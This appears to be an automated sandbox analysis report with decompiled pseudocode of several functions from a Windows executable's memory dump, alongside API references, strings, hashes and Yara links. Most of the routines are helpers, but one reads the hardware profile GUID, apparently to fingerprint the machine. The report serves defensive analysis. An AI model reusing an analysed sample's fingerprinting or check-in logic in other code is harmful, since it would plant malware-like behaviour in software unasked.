Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
String ID:
API String ID: 1859398019-0
Opcode ID: 54fda34d4aa980e5337c76e2cc5fef6c1108d4bfad27b0d497303b985580ca67
Instruction ID: b9b52853d7b35784712616559d2a5a1b3f5fb1fcf8f8587e78bb259a8830eb46
Opcode Fuzzy Hash: 54fda34d4aa980e5337c76e2cc5fef6c1108d4bfad27b0d497303b985580ca67
Instruction Fuzzy Hash: 6BF024757C632077F23027703C0EFAB2A586B02F56F200021FB49FB2E0D6B8A91446AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040E910 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E0040E910(char _a4, char _a20, intOrPtr _a24, char _a32, char _a48, intOrPtr _a52, char _a60, intOrPtr _a80) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				char _v32;
				char _v48;
				intOrPtr _v56;
				char _v60;
				char _v76;
				intOrPtr _v84;
				char _v88;
				char _v104;
				intOrPtr _v112;
				char _v116;
				char _v132;
				intOrPtr _v140;
				char _v160;
				char _v161;
				intOrPtr _v168;
				intOrPtr _v172;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t83;
				signed int _t84;
				char* _t86;
				void* _t87;
				void* _t91;
				void* _t96;
				char* _t98;
				void* _t100;
				char* _t102;
				char* _t107;
				intOrPtr _t115;
				char* _t119;
				char* _t120;
				intOrPtr _t137;
				intOrPtr _t140;
				signed int _t141;
				void* _t142;
				void* _t143;
				void* _t145;
				char* _t146;
				char* _t147;
				void* _t148;
				void* _t149;

				_push(0xffffffff);
				_push(E0043E4CE);
				_push( *[fs:0x0]);
				_t143 = _t142 - 0x9c;
				_t83 =  *0x451f00; // 0xc21d6f0a
				_t84 = _t83 ^ _t141;
				_v20 = _t84;
				_push(_t84);
				 *[fs:0x0] =  &_v16;
				_v8 = 0;
				_v28 = 0xf;
				_v32 = 0;
				_v48 = 0;
				_t86 = _a4;
				_v8 = 3;
				_t151 = _a24 - 0x10;
				if(_a24 < 0x10) {
					_t86 =  &_a4;
				}
				_t87 = E004140E0(0, 0xf, _t86); // executed
				 *0x464890(_t87, "https");
				_v168 = E0040A830( &_v161,  &_v132);
				_v8 = 4;
				_t91 = E0040D100(_t151,  &_v104,  &_a4, "/");
				_v8 = 5;
				E00404E00(_v168,  &_v76, _t91, _v168);
				_t145 = _t143 + 0x1c;
				if(_v84 >= 0x10) {
					_push(_v104);
					E0042A289();
					_t145 = _t145 + 4;
				}
				_v84 = 0xf;
				_v88 = 0;
				_v104 = 0;
				_v8 = 8;
				_t153 = _v112 - 0x10;
				if(_v112 >= 0x10) {
					_push(_v132);
					E0042A289();
					_t145 = _t145 + 4;
				}
				_t146 = _t145 - 0x1c;
				_t119 = _t146;
				_v168 = _t146;
				_t134 =  &_a60;
				 *((intOrPtr*)(_t119 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t119 + 0x10)) = 0;
				_v112 = 0xf;
				_v116 = 0;
				_v132 = 0;
				 *_t119 = 0;
				E00404AD0(_t119,  &_a60, 0, 0xffffffff);
				_push(0);
				_t147 = _t146 - 0x1c;
				_t120 = _t147;
				_v172 = _t147;
				 *((intOrPtr*)(_t120 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t120 + 0x10)) = 0;
				_v8 = 9;
				 *_t120 = 0;
				E00404AD0(_t120,  &_v76, 0, 0xffffffff);
				_push( &_v160);
				_v8 = 8;
				_t96 = E0040D960(_t153); // executed
				_t148 = _t147 + 0x40;
				_v8 = 0xa;
				E00404D00( &_v48, _t96);
				_v8 = 8;
				if(_v140 >= 0x10) {
					_t134 = _v160;
					_push(_v160);
					E0042A289();
					_t148 = _t148 + 4;
				}
				_t98 = _v48;
				if(_v28 < 0x10) {
					_t98 =  &_v48;
				}
				_push("ERROR");
				_push(_t98);
				if( *0x464890() == 0) {
					_t100 = E0042BC70("ERROR");
					_t149 = _t148 + 4;
					E00404BC0(0x451844, "ERROR", _t100);
				} else {
					E00404AD0(0x451844,  &_a4, 0, 0xffffffff);
					_t107 = _v48;
					_t157 = _v28 - 0x10;
					if(_v28 < 0x10) {
						_t107 =  &_v48;
					}
					E004099E0(0, 0xf, _t157, _t107); // executed
					_t149 = _t148 + 4;
				}
				_t102 = _v48;
				_v32 = 0;
				if(_v28 < 0x10) {
					_t102 =  &_v48;
				}
				 *_t102 = 0;
				if(_v56 >= 0x10) {
					_push(_v76);
					_t102 = E0042A289();
					_t149 = _t149 + 4;
				}
				_v56 = 0xf;
				_v60 = 0;
				_v76 = 0;
				if(_v28 >= 0x10) {
					_t134 = _v48;
					_push(_v48);
					_t102 = E0042A289();
					_t149 = _t149 + 4;
				}
				_v28 = 0xf;
				_v32 = 0;
				_v48 = 0;
				if(_a24 >= 0x10) {
					_push(_a4);
					_t102 = E0042A289();
					_t149 = _t149 + 4;
				}
				_a24 = 0xf;
				_a20 = 0;
				_a4 = 0;
				if(_a52 >= 0x10) {
					_push(_a32);
					_t102 = E0042A289();
					_t149 = _t149 + 4;
				}
				_a52 = 0xf;
				_a48 = 0;
				_a32 = 0;
				if(_a80 >= 0x10) {
					_t134 = _a60;
					_push(_a60);
					_t102 = E0042A289();
				}
				 *[fs:0x0] = _v16;
				_pop(_t137);
				_pop(_t140);
				_pop(_t115);
				return E0042A36A(_t102, _t115, _v20 ^ _t141, _t134, _t137, _t140);
			}

0x0040e913
0x0040e915
0x0040e920
0x0040e921
0x0040e927
0x0040e92c
0x0040e92e
0x0040e934
0x0040e938
0x0040e940
0x0040e948
0x0040e94b
0x0040e94e
0x0040e951
0x0040e959
0x0040e95d
0x0040e960
0x0040e962
0x0040e962
0x0040e96b
0x0040e974
0x0040e989
0x0040e99c
0x0040e9a0
0x0040e9b1
0x0040e9b5
0x0040e9ba
0x0040e9c0
0x0040e9c5
0x0040e9c6
0x0040e9cb
0x0040e9cb
0x0040e9ce
0x0040e9d1
0x0040e9d4
0x0040e9d7
0x0040e9db
0x0040e9de
0x0040e9e3
0x0040e9e4
0x0040e9e9
0x0040e9e9
0x0040e9ec
0x0040e9ef
0x0040e9f1
0x0040e9fa
0x0040e9fd
0x0040ea00
0x0040ea04
0x0040ea07
0x0040ea0a
0x0040ea0d
0x0040ea0f
0x0040ea14
0x0040ea15
0x0040ea18
0x0040ea1a
0x0040ea26
0x0040ea29
0x0040ea2d
0x0040ea31
0x0040ea33
0x0040ea3e
0x0040ea3f
0x0040ea43
0x0040ea48
0x0040ea4f
0x0040ea53
0x0040ea58
0x0040ea62
0x0040ea64
0x0040ea6a
0x0040ea6b
0x0040ea70
0x0040ea70
0x0040ea73
0x0040ea79
0x0040ea7b
0x0040ea7b
0x0040ea7e
0x0040ea83
0x0040ea8c
0x0040eaba
0x0040eabf
0x0040eacd
0x0040ea8e
0x0040ea9a
0x0040ea9f
0x0040eaa2
0x0040eaa5
0x0040eaa7
0x0040eaa7
0x0040eaab
0x0040eab0
0x0040eab0
0x0040ead2
0x0040ead5
0x0040eadb
0x0040eadd
0x0040eadd
0x0040eae0
0x0040eae5
0x0040eaea
0x0040eaeb
0x0040eaf0
0x0040eaf0
0x0040eaf3
0x0040eaf6
0x0040eaf9
0x0040eaff
0x0040eb01
0x0040eb04
0x0040eb05
0x0040eb0a
0x0040eb0a
0x0040eb0d
0x0040eb10
0x0040eb13
0x0040eb19
0x0040eb1e
0x0040eb1f
0x0040eb24
0x0040eb24
0x0040eb27
0x0040eb2a
0x0040eb2d
0x0040eb33
0x0040eb38
0x0040eb39
0x0040eb3e
0x0040eb3e
0x0040eb41
0x0040eb44
0x0040eb47
0x0040eb4d
0x0040eb4f
0x0040eb52
0x0040eb53
0x0040eb58
0x0040eb5e
0x0040eb66
0x0040eb67
0x0040eb68
0x0040eb76

APIs

StrCmpCA.SHLWAPI(00000000), ref: 0040E974
StrCmpCA.SHLWAPI(?,ERROR,00000000), ref: 0040EA84
_strlen.LIBCMT ref: 0040EABA

Strings

ERROR, xrefs: 0040EA7E, 0040EAB5, 0040EAC3
https, xrefs: 0040E965

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _strlen
String ID: ERROR$https
API String ID: 4218353326-230934144
Opcode ID: 49f557033340eeb932a8d04b5c61017f3f5817c8656c810c4cc700a9a402018a
Instruction ID: 7a36bf28d2fd6ca974a50b2e2ec7b2d294f93e614f03696163030e001c9beb64
Opcode Fuzzy Hash: 49f557033340eeb932a8d04b5c61017f3f5817c8656c810c4cc700a9a402018a
Instruction Fuzzy Hash: C581A1B1D00248EFCF00DFAAD881ADEBBB8AF15304F10856FF40567281D7789654CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00420520 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00420520(void* __edi, void* __eflags, intOrPtr _a4) {
				void* __esi;
				signed int _t13;
				intOrPtr _t17;
				void* _t19;
				intOrPtr _t22;
				void* _t24;
				CHAR* _t25;
				void* _t26;
				void* _t28;

				_t17 = _a4;
				_t25 = E0042BDF8(_t19, __edi, _t24, _t17);
				 *_t25 = 0;
				E0042E0CE(GetTickCount()); // executed
				_t28 = _t26 + 8;
				_t30 = _t17;
				if(_t17 <= 0) {
					 *((char*)(0 + _t25)) = 0;
					return _t25;
				} else {
					_push(__edi);
					_t22 = _t17;
					do {
						_t13 = E0042E0E0(_t30);
						asm("cdq");
						_push(_t13 % 0xa);
						_push(_t25);
						wsprintfA(_t25, "%s%d");
						_t28 = _t28 + 0x10;
						_t22 = _t22 - 1;
					} while (_t22 != 0);
					 *((char*)(_t17 + _t25)) = 0;
					return _t25;
				}
			}

0x00420524
0x0042052e
0x00420533
0x0042053d
0x00420542
0x00420547
0x00420549
0x0042057e
0x00420586
0x0042054b
0x0042054b
0x0042054c
0x00420550
0x00420550
0x00420555
0x0042055d
0x0042055e
0x00420565
0x0042056b
0x0042056e
0x0042056e
0x00420572
0x0042057b
0x0042057b

APIs

_malloc.LIBCMT ref: 00420529

Part of subcall function 0042BDF8: __FF_MSGBANNER.LIBCMT ref: 0042BE11
Part of subcall function 0042BDF8: __NMSG_WRITE.LIBCMT ref: 0042BE18
Part of subcall function 0042BDF8: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,0042C560,?), ref: 0042BE3D

GetTickCount.KERNEL32 ref: 00420536

Part of subcall function 0042E0CE: __getptd.LIBCMT ref: 0042E0D3

_rand.LIBCMT ref: 00420550

Part of subcall function 0042E0E0: __getptd.LIBCMT ref: 0042E0E0

wsprintfA.USER32 ref: 00420565

Strings

%s%d, xrefs: 0042055F

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __getptd$AllocateCountHeapTick_malloc_randwsprintf
String ID: %s%d
API String ID: 2840978672-1110647743
Opcode ID: 60d8bd9919e5c9cb452990a781c396ff844565d4cd78976920db54090740c5cc
Instruction ID: fb86dadaeb94fbc4fa0a5336e46a3d50ee995aff06ec8a2bfe3627ef3b40dd00
Opcode Fuzzy Hash: 60d8bd9919e5c9cb452990a781c396ff844565d4cd78976920db54090740c5cc
Instruction Fuzzy Hash: 0CF0FCA230126157D3006BEE7C45B57BA8CDFA1360F54047BF509C7203E9A9D85183BB

Uniqueness

Uniqueness Score: -1.00%

Function 0042C541 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0042C541(void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char* _v8;
				signed int _v20;
				long _v24;
				long _v36;
				void* _v40;
				void _v64;
				void* _t23;
				signed int _t24;
				signed int _t29;
				DWORD* _t30;
				signed int _t37;
				void* _t41;
				void* _t42;
				void* _t48;

				_t48 = __esi;
				_t42 = __edi;
				_t41 = __edx;
				while(1) {
					_t23 = E0042BDF8(_t41, _t42, _t48, _a4); // executed
					if(_t23 != 0) {
						break;
					}
					_t24 = E00431367(_t23, _a4);
					__eflags = _t24;
					if(_t24 == 0) {
						__eflags =  *0x464bb4 & 0x00000001;
						if(( *0x464bb4 & 0x00000001) == 0) {
							 *0x464bb4 =  *0x464bb4 | 0x00000001;
							__eflags =  *0x464bb4;
							_push(1);
							_v8 = "bad allocation";
							E0042BEC6(0x464ba8,  &_v8);
							 *0x464ba8 = 0x443c14;
							E0042D14E( *0x464bb4, E0043FF01);
						}
						E0042BFD3( &_v20, 0x464ba8);
						_push(0x44b220);
						_push( &_v20);
						_v20 = 0x443c14;
						L7();
						asm("int3");
						_push(0x443c14);
						_push(0x464ba8);
						_t37 = 8;
						_v40 = memcpy( &_v64, 0x4478c0, _t37 << 2);
						_t29 = _v20;
						_v36 = _t29;
						__eflags = _t29;
						if(_t29 != 0) {
							__eflags =  *_t29 & 0x00000008;
							if(( *_t29 & 0x00000008) != 0) {
								_v20 = 0x1994000;
							}
						}
						_t30 =  &_v20;
						RaiseException(_v40, _v36, _v24, _t30);
						return _t30;
					} else {
						continue;
					}
					L11:
				}
				return _t23;
				goto L11;
			}

0x0042c541
0x0042c541
0x0042c541
0x0042c558
0x0042c55b
0x0042c563
0x00000000
0x00000000
0x0042c54e
0x0042c554
0x0042c556
0x0042c567
0x0042c578
0x0042c57a
0x0042c57a
0x0042c581
0x0042c589
0x0042c590
0x0042c59a
0x0042c5a0
0x0042c5a5
0x0042c5aa
0x0042c5af
0x0042c5b7
0x0042c5b8
0x0042c5bb
0x0042c5c0
0x0042c5cc
0x0042c5cd
0x0042c5d0
0x0042c5db
0x0042c5de
0x0042c5e2
0x0042c5e6
0x0042c5e8
0x0042c5ea
0x0042c5ed
0x0042c5ef
0x0042c5ef
0x0042c5ed
0x0042c5f6
0x0042c603
0x0042c60a
0x00000000
0x00000000
0x00000000
0x00000000
0x0042c556
0x0042c566
0x00000000

APIs

_malloc.LIBCMT ref: 0042C55B

Part of subcall function 0042BDF8: __FF_MSGBANNER.LIBCMT ref: 0042BE11
Part of subcall function 0042BDF8: __NMSG_WRITE.LIBCMT ref: 0042BE18
Part of subcall function 0042BDF8: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,0042C560,?), ref: 0042BE3D

std::exception::exception.LIBCMT ref: 0042C590
std::exception::exception.LIBCMT ref: 0042C5AA
__CxxThrowException@8.LIBCMT ref: 0042C5BB

Strings

bad allocation, xrefs: 0042C589

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: bad allocation
API String ID: 615853336-2104205924
Opcode ID: 5a894b7c990d80216537a3f7d93c8f6993f4098bdfec07563c06d402b83d2592
Instruction ID: dc089c5ddcf5cb7305968cde2998e99a8bfb542f89d852346dca4d98caaf549d
Opcode Fuzzy Hash: 5a894b7c990d80216537a3f7d93c8f6993f4098bdfec07563c06d402b83d2592
Instruction Fuzzy Hash: 9AF0D631A001396ADF00EB15EC45AAE77A8AF40B48FA0002BF90096191DBB8EA80869D

Uniqueness

Uniqueness Score: -1.00%

Function 00426D60 Relevance: 7.6, APIs: 5, Instructions: 134
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00426D60(signed int __ecx, CHAR* _a4, long _a8, long _a12) {
				long _t32;
				CHAR* _t34;
				void* _t35;
				void* _t37;
				void* _t42;
				void* _t45;
				signed int _t46;
				signed int _t49;
				signed char _t50;
				long _t56;
				signed int _t60;

				_t49 = __ecx;
				_t60 = __ecx;
				if( *(__ecx + 4) != 0 ||  *((intOrPtr*)(__ecx + 0xc)) != 0 ||  *((intOrPtr*)(__ecx + 0x20)) != 0 ||  *((intOrPtr*)(__ecx + 0x18)) != 0 ||  *((intOrPtr*)(__ecx + 0x14)) != 0 ||  *((intOrPtr*)(__ecx + 0x2c)) != 0) {
					return 0x1000000;
				} else {
					_t32 = _a12;
					if(_t32 != 1) {
						if(_t32 != 2) {
							if(_t32 != 3) {
								return 0x10000;
							} else {
								_t56 = _a8;
								if(_t56 != 0) {
									_t34 = _a4;
									if(_t34 == 0) {
										_t35 = CreateFileMappingA(0xffffffff, 0, 4, 0, _t56, 0); // executed
										 *(_t60 + 0xc) = _t35;
										if(_t35 == 0) {
											L21:
											return 0x300;
										} else {
											_t37 = MapViewOfFile(_t35, 0xf001f, 0, 0, _t56); // executed
											 *(_t60 + 0x20) = _t37;
											if(_t37 != 0) {
												goto L17;
											} else {
												CloseHandle( *(_t60 + 0xc));
												 *(_t60 + 0xc) = 0;
												goto L21;
											}
										}
									} else {
										 *((intOrPtr*)(__ecx + 0x20)) = _t34;
										L17:
										 *(_t60 + 0x28) = _t56;
										 *((intOrPtr*)(_t60 + 0x24)) = 0;
										 *(_t60 + 0x1c) = 1;
										return 0;
									}
								} else {
									return 0x30000;
								}
							}
						} else {
							_t42 = CreateFileA(_a4, 0x40000000, 0, 0, _t32, 0x80, 0);
							 *(_t60 + 4) = _t42;
							if(_t42 != 0xffffffff) {
								 *(_t60 + 0x10) = 0;
								 *(_t60 + 0x1c) = 1;
								 *((char*)(_t60 + 8)) = 1;
								return 0;
							} else {
								 *(_t60 + 4) = 0;
								return 0x200;
							}
						}
					} else {
						_t45 = _a4;
						 *(__ecx + 4) = _t45;
						 *((char*)(__ecx + 8)) = 0;
						_t46 = SetFilePointer(_t45, 0, 0, 1);
						_t50 = _t49 & 0xffffff00 | _t46 != 0xffffffff;
						 *(_t60 + 0x1c) = _t50;
						asm("sbb ecx, ecx");
						 *(_t60 + 0x10) =  ~(_t50 & 0x000000ff) & _t46;
						return 0;
					}
				}
			}

0x00426d60
0x00426d65
0x00426d6c
0x00426eab
0x00426d9f
0x00426d9f
0x00426da5
0x00426ddb
0x00426e21
0x00426ea0
0x00426e23
0x00426e24
0x00426e29
0x00426e37
0x00426e3c
0x00426e5c
0x00426e62
0x00426e67
0x00426e8c
0x00426e95
0x00426e69
0x00426e72
0x00426e78
0x00426e7d
0x00000000
0x00426e7f
0x00426e83
0x00426e89
0x00000000
0x00426e89
0x00426e7d
0x00426e3e
0x00426e3e
0x00426e41
0x00426e41
0x00426e45
0x00426e48
0x00426e51
0x00426e51
0x00426e2b
0x00426e34
0x00426e34
0x00426e29
0x00426ddd
0x00426def
0x00426df5
0x00426dfb
0x00426e0b
0x00426e0e
0x00426e12
0x00426e1b
0x00426dfd
0x00426dfd
0x00426e08
0x00426e08
0x00426dfb
0x00426da7
0x00426da7
0x00426daf
0x00426db2
0x00426db5
0x00426dbe
0x00426dc1
0x00426dc9
0x00426dcd
0x00426dd5
0x00426dd5
0x00426da5

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,0042804A,?,?,?), ref: 00426DB5
CreateFileA.KERNEL32(?,40000000,00000000,00000000,0042804A,00000080,00000000,00000000,?,?,0042804A,?,?,?), ref: 00426DEF

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: a3610362ecc1fd62d5e634cb84aa8081b091d0e51e7ec5998b28082f8cdd6c01
Instruction ID: f63494312b9a0bdc7d8593c4afd9de7bb78168041c9d1fa13034b6a76d16d1b1
Opcode Fuzzy Hash: a3610362ecc1fd62d5e634cb84aa8081b091d0e51e7ec5998b28082f8cdd6c01
Instruction Fuzzy Hash: 124183B66057149FEB309F29F8C0B67B7D8EB64324F118A2FF156C6640D3759C848B68

Uniqueness

Uniqueness Score: -1.00%

Function 00422F40 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00422F40(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed long long _a24) {
				signed int _v8;
				char _v14;
				char _v15;
				long _v16;
				long _v124;
				char _v125;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t60;
				signed int _t63;
				signed char _t66;
				short* _t67;
				int _t69;
				intOrPtr _t75;
				signed int _t77;
				char _t79;
				signed int _t85;
				signed int _t86;
				signed int _t90;
				intOrPtr _t91;
				void* _t92;
				signed int _t94;
				void* _t95;
				signed int _t98;
				void* _t102;
				signed int _t109;
				signed int _t113;
				signed long long _t121;

				_t60 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t60 ^ _t94;
				_t75 = _a16;
				_t91 =  *((intOrPtr*)(_t75 + 0x18));
				_v140 = _a4;
				_t63 =  *(_t75 + 0x1c);
				_t90 = 0;
				_v144 = __ecx;
				_t98 = _t63;
				if(_t98 <= 0 && (_t98 < 0 || _t91 <= 0) && ( *(_t75 + 0x14) & 0x00002000) == 0) {
					_t91 = 6;
					_t63 = 0;
				}
				_t77 = _t63;
				_t102 = _t77 - _t90;
				if(_t102 < 0 || _t102 <= 0 && _t91 <= 0x24) {
					_v136 = _t91;
				} else {
					_v136 = 0x24;
				}
				_t121 = _a24;
				asm("cdq");
				_t92 = _t91 - _v136;
				asm("sbb ecx, edx");
				_t85 =  *(_t75 + 0x14);
				_t66 = _t85 & 0x00003000;
				_v132 = _t90;
				if(_t66 != 0x2000) {
					L35:
					_v16 = 0x25;
					_t67 =  &_v15;
					if((_t85 & 0x00000020) != 0) {
						_v15 = 0x2b;
						_t67 =  &_v14;
					}
					if((_t85 & 0x00000010) != 0) {
						 *_t67 = 0x23;
						_t67 = _t67 + 1;
					}
					_t86 = _t85 & 0x00003000;
					 *_t67 = 0x2a2e;
					_t119 = _t86 - 0x2000;
					if(_t86 != 0x2000) {
						__eflags = _t86 - 0x3000;
						if(__eflags != 0) {
							__eflags = _t86 - 0x1000;
							_t44 = _t86 != 0x1000;
							__eflags = _t44;
							_t79 = (_t77 & 0xffffff00 | _t44) + (_t77 & 0xffffff00 | _t44) + 0x65;
						} else {
							_t79 = 0x61;
						}
					} else {
						_t79 = 0x66;
					}
					 *((char*)(_t67 + 2)) = _t79;
					 *(_t95 - 8) = _t121;
					 *((char*)(_t67 + 3)) = 0;
					_t69 = swprintf( &_v124, 0x6c,  &_v16, _v136); // executed
					E00422220(_t119, _v144, _v140, _a8, _a12, _t75, _a20,  &_v124, _v132, _t90, _t92, _t69);
					return E0042A36A(_v140, _t75, _v8 ^ _t94, _a8, _t90, _v140);
				} else {
					_t121 = st1;
					asm("fucompp");
					asm("fnstsw ax");
					if((_t66 & 0x00000044) != 0) {
						goto L35;
					}
					asm("fldz");
					asm("fcom st0, st1");
					asm("fnstsw ax");
					if((_t66 & 0x00000041) != 0) {
						_v125 = 0;
						asm("fxch st0, st1");
					} else {
						asm("fxch st0, st1");
						_v125 = 1;
						asm("fchs");
					}
					asm("fcom st0, st1");
					asm("fnstsw ax");
					_t121 =  *0x446ba0;
					if((_t66 & 0x00000041) != 0) {
						while(1) {
							__eflags = _v132 - 0x1388;
							if(__eflags >= 0) {
								goto L16;
							}
							_t121 = _t121 / st0;
							_v132 = _v132 + 0xa;
							asm("fxch st0, st1");
							asm("fcom st0, st2");
							asm("fnstsw ax");
							__eflags = _t66 & 0x00000041;
							if(__eflags != 0) {
								asm("fxch st0, st1");
								continue;
							}
							st0 = _t121;
							goto L21;
						}
						goto L16;
					} else {
						L16:
						st1 = _t121;
						L21:
						asm("fxch st0, st2");
						asm("fcomp st0, st1");
						asm("fnstsw ax");
						if((_t66 & 0x00000005) != 0) {
							L33:
							st1 = _t121;
							if(_v125 != 0) {
								asm("fchs");
							}
							goto L35;
						}
						_t109 = _t77;
						if(_t109 >= 0 && (_t109 > 0 || _t92 >= 0xa)) {
							_t121 =  *0x446b98;
							while(1) {
								asm("fcom st0, st1");
								asm("fnstsw ax");
								if((_t66 & 0x00000001) != 0 || _t90 >= 0x1388) {
									break;
								}
								_t92 = _t92 + 0xfffffff6;
								asm("fxch st0, st1");
								asm("adc ecx, 0xffffffff");
								_t121 = _t121 * st2;
								_t90 = _t90 + 0xa;
								_t113 = _t77;
								if(_t113 > 0 || _t113 >= 0 && _t92 >= 0xa) {
									asm("fxch st0, st1");
									continue;
								} else {
									st1 = _t121;
									goto L33;
								}
							}
							st0 = _t121;
						}
						goto L33;
					}
				}
			}

0x00422f49
0x00422f50
0x00422f57
0x00422f5b
0x00422f5f
0x00422f65
0x00422f68
0x00422f6a
0x00422f70
0x00422f72
0x00422f83
0x00422f88
0x00422f88
0x00422f8a
0x00422f8c
0x00422f8e
0x00422fa3
0x00422f97
0x00422f97
0x00422f97
0x00422faf
0x00422fb2
0x00422fb3
0x00422fb5
0x00422fb7
0x00422fbc
0x00422fc1
0x00422fc9
0x0042308d
0x0042308d
0x00423091
0x00423097
0x00423099
0x0042309d
0x0042309d
0x004230a3
0x004230a5
0x004230a8
0x004230a8
0x004230a9
0x004230af
0x004230b4
0x004230ba
0x004230c4
0x004230ca
0x004230d0
0x004230d6
0x004230d6
0x004230d9
0x004230cc
0x004230cc
0x004230cc
0x004230bc
0x004230bc
0x004230bc
0x004230e0
0x004230e3
0x004230f1
0x004230fb
0x00423126
0x00423140
0x00422fcf
0x00422fd7
0x00422fd9
0x00422fdb
0x00422fe0
0x00000000
0x00000000
0x00422fe6
0x00422fe8
0x00422fea
0x00422fef
0x00422ffb
0x00422fff
0x00422ff1
0x00422ff1
0x00422ff3
0x00422ff7
0x00422ff7
0x00423007
0x00423009
0x0042300b
0x00423014
0x0042301c
0x0042301c
0x00423023
0x00000000
0x00000000
0x00423025
0x00423027
0x0042302b
0x0042302d
0x0042302f
0x00423031
0x00423034
0x0042301a
0x00000000
0x0042301a
0x00423036
0x00000000
0x00423036
0x00000000
0x00423016
0x00423016
0x00423016
0x00423038
0x00423038
0x0042303a
0x0042303c
0x00423041
0x00423083
0x00423087
0x00423089
0x0042308b
0x0042308b
0x00000000
0x00423089
0x00423043
0x00423045
0x0042304e
0x00423058
0x00423058
0x0042305a
0x0042305f
0x00000000
0x00000000
0x00423069
0x0042306c
0x0042306e
0x00423071
0x00423073
0x00423076
0x00423078
0x00423056
0x00000000
0x00423081
0x00423081
0x00000000
0x00423081
0x00423078
0x004230c0
0x004230c0
0x00000000
0x00423045
0x00423014

APIs

swprintf.LIBCMT ref: 004230FB

Strings

$, xrefs: 00422F97
%, xrefs: 0042308D
+, xrefs: 00423099

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: swprintf
String ID: $$%$+
API String ID: 233258989-3202472541
Opcode ID: ff759c08f6ce0be4ef85c5516c54d31c3adff8b0076ee00f745a7119a6a4ebef
Instruction ID: 8c64e7c598c01b22fefa00e1924d435ec0895d9290b7478481549a9359199a1c
Opcode Fuzzy Hash: ff759c08f6ce0be4ef85c5516c54d31c3adff8b0076ee00f745a7119a6a4ebef
Instruction Fuzzy Hash: E6518B72F00224AADF119E58E9447DF7BB4EB41740F61898AD440E329AE67D4E448BE9

Uniqueness

Uniqueness Score: -1.00%

Function 0041F540 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E0041F540(intOrPtr __ebx, intOrPtr __edi, char* _a4) {
				signed int _v8;
				struct tagHW_PROFILE_INFOA _v132;
				char _v136;
				void* __esi;
				signed int _t10;
				int _t13;
				intOrPtr _t19;
				intOrPtr _t25;
				char* _t26;
				signed int _t27;

				_t25 = __edi;
				_t19 = __ebx;
				_t10 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t10 ^ _t27;
				_t26 = _a4;
				_v136 = 0;
				_t13 = GetCurrentHwProfileA( &_v132); // executed
				 *((intOrPtr*)(_t26 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t26 + 0x10)) = 0;
				 *_t26 = 0;
				if(_t13 == 0) {
					_push(E0042BC70("Unknown"));
					_push("Unknown");
				} else {
					_push(E0042BC70( &(_v132.szHwProfileGuid)));
					_t24 =  &(_v132.szHwProfileGuid);
					_push( &(_v132.szHwProfileGuid));
				}
				E00404BC0(_t26);
				return E0042A36A(_t26, _t19, _v8 ^ _t27, _t24, _t25, _t26);
			}

0x0041f540
0x0041f540
0x0041f549
0x0041f550
0x0041f554
0x0041f55b
0x0041f565
0x0041f56b
0x0041f572
0x0041f579
0x0041f57e
0x0041f5a0
0x0041f5a1
0x0041f580
0x0041f58c
